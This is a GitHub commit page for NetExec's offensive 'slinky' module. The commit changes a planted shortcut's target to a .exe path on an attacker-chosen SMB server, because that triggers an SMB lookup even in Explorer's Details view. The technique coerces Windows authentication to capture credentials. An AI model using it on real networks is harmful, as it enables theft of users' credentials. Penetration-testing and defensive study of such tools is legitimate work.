Skip to content

Commit b974d3d

Browse files
authored
Use .exe as target
Use .exe as target, since it triggers an SMB query also on Windows Explorer "Details view". Signed-off-by: Geetub <17295502+Geetub@users.noreply.github.com>
1 parent d5e6e6d commit b974d3d

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

nxc/modules/slinky.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -67,7 +67,7 @@ def options(self, context, module_options):
6767

6868
if not self.cleanup:
6969
self.server = module_options["SERVER"]
70-
target_path = f"\\\\{self.server}\\share\\{self.lnk_name}.png"
70+
target_path = f"\\\\{self.server}\\share\\{self.lnk_name}.exe"
7171
pylnk3.for_file(target_path, self.local_lnk_path)
7272

7373
def on_login(self, context, connection):

0 commit comments

Comments
 (0)